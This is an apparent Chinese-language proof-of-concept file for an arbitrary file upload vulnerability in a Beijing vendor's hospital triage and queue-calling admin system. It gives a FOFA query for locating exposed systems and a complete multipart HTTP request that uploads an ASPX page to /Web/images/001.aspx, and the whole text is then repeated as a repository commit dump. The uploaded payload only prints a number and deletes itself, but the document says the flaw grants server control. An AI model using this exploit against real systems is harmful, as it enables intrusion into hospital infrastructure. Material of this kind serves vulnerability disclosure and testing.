POC/wpoc/北京神州/分诊叫号后台系统存在任意文件上传漏洞.md

# 分诊叫号后台系统存在任意文件上传漏洞
北京神州视翰科技有限公司分诊叫号后台系统存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

## fofa

```javascript
title="分诊叫号后台"
```

## poc
```javascript
POST /api/doctor/ HTTP/1.1
Host: 
Content-Length: 756
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKZ5OA1LLddPA4mKc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: need_login=
Connection: close

------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="doctorid"

0
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="login_id"

001.aspx
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="name"

22
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="title"

23
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="department"

24
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="description"

------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="icon"; filename="11.txt"
Content-Type: text/aspx

<%@ Page Language="C#"%><% Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>
------WebKitFormBoundaryKZ5OA1LLddPA4mKc--
```
![image.png](https://cdn.nlark.com/yuque/0/2024/png/1622799/1713976131743-47c1a359-fac8-4890-a2b5-743c3d445850.png#averageHue=%23e8ecf0&clientId=ufb6cafc5-cf89-4&from=paste&height=812&id=udb9bff50&originHeight=1624&originWidth=3024&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1089367&status=done&style=none&taskId=u68119bb4-e3a1-4437-8755-12ecb261032&title=&width=1512)
文件上传位置

```
/Web/images/001.aspx
```
![image.png](https://cdn.nlark.com/yuque/0/2024/png/1622799/1713976158425-390fe582-beb0-443a-ad68-6ed075d5ede4.png#averageHue=%23fdfdfd&clientId=ufb6cafc5-cf89-4&from=paste&height=548&id=ud04c290f&originHeight=1096&originWidth=2816&originalType=binary&ratio=2&rotation=0&showTitle=false&size=210193&status=done&style=none&taskId=uaabd67ae-1d19-481d-bda6-76dbed33dec&title=&width=1408)
first commit 2025-03-04 23:12:57 +08:00			`# 分诊叫号后台系统存在任意文件上传漏洞`
			`北京神州视翰科技有限公司分诊叫号后台系统存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。`

			`## fofa`

			```javascript
			`title="分诊叫号后台"`
			```

			`## poc`
			```javascript
			`POST /api/doctor/ HTTP/1.1`
			`Host:`
			`Content-Length: 756`
			`Cache-Control: max-age=0`
			`Upgrade-Insecure-Requests: 1`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKZ5OA1LLddPA4mKc`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7`
			`Accept-Encoding: gzip, deflate, br`
			`Accept-Language: zh-CN,zh;q=0.9`
			`Cookie: need_login=`
			`Connection: close`

			`------WebKitFormBoundaryKZ5OA1LLddPA4mKc`
			`Content-Disposition: form-data; name="doctorid"`

			`0`
			`------WebKitFormBoundaryKZ5OA1LLddPA4mKc`
			`Content-Disposition: form-data; name="login_id"`

			`001.aspx`
			`------WebKitFormBoundaryKZ5OA1LLddPA4mKc`
			`Content-Disposition: form-data; name="name"`

			`22`
			`------WebKitFormBoundaryKZ5OA1LLddPA4mKc`
			`Content-Disposition: form-data; name="title"`

			`23`
			`------WebKitFormBoundaryKZ5OA1LLddPA4mKc`
			`Content-Disposition: form-data; name="department"`

			`24`
			`------WebKitFormBoundaryKZ5OA1LLddPA4mKc`
			`Content-Disposition: form-data; name="description"`

			`------WebKitFormBoundaryKZ5OA1LLddPA4mKc`
			`Content-Disposition: form-data; name="icon"; filename="11.txt"`
			`Content-Type: text/aspx`

			`<%@ Page Language="C#"%><% Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>`
			`------WebKitFormBoundaryKZ5OA1LLddPA4mKc--`
			```
			`![image.png](https://cdn.nlark.com/yuque/0/2024/png/1622799/1713976131743-47c1a359-fac8-4890-a2b5-743c3d445850.png#averageHue=%23e8ecf0&clientId=ufb6cafc5-cf89-4&from=paste&height=812&id=udb9bff50&originHeight=1624&originWidth=3024&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1089367&status=done&style=none&taskId=u68119bb4-e3a1-4437-8755-12ecb261032&title=&width=1512)`
			`文件上传位置`

			```
			`/Web/images/001.aspx`
			```
			`![image.png](https://cdn.nlark.com/yuque/0/2024/png/1622799/1713976158425-390fe582-beb0-443a-ad68-6ed075d5ede4.png#averageHue=%23fdfdfd&clientId=ufb6cafc5-cf89-4&from=paste&height=548&id=ud04c290f&originHeight=1096&originWidth=2816&originalType=binary&ratio=2&rotation=0&showTitle=false&size=210193&status=done&style=none&taskId=uaabd67ae-1d19-481d-bda6-76dbed33dec&title=&width=1408)`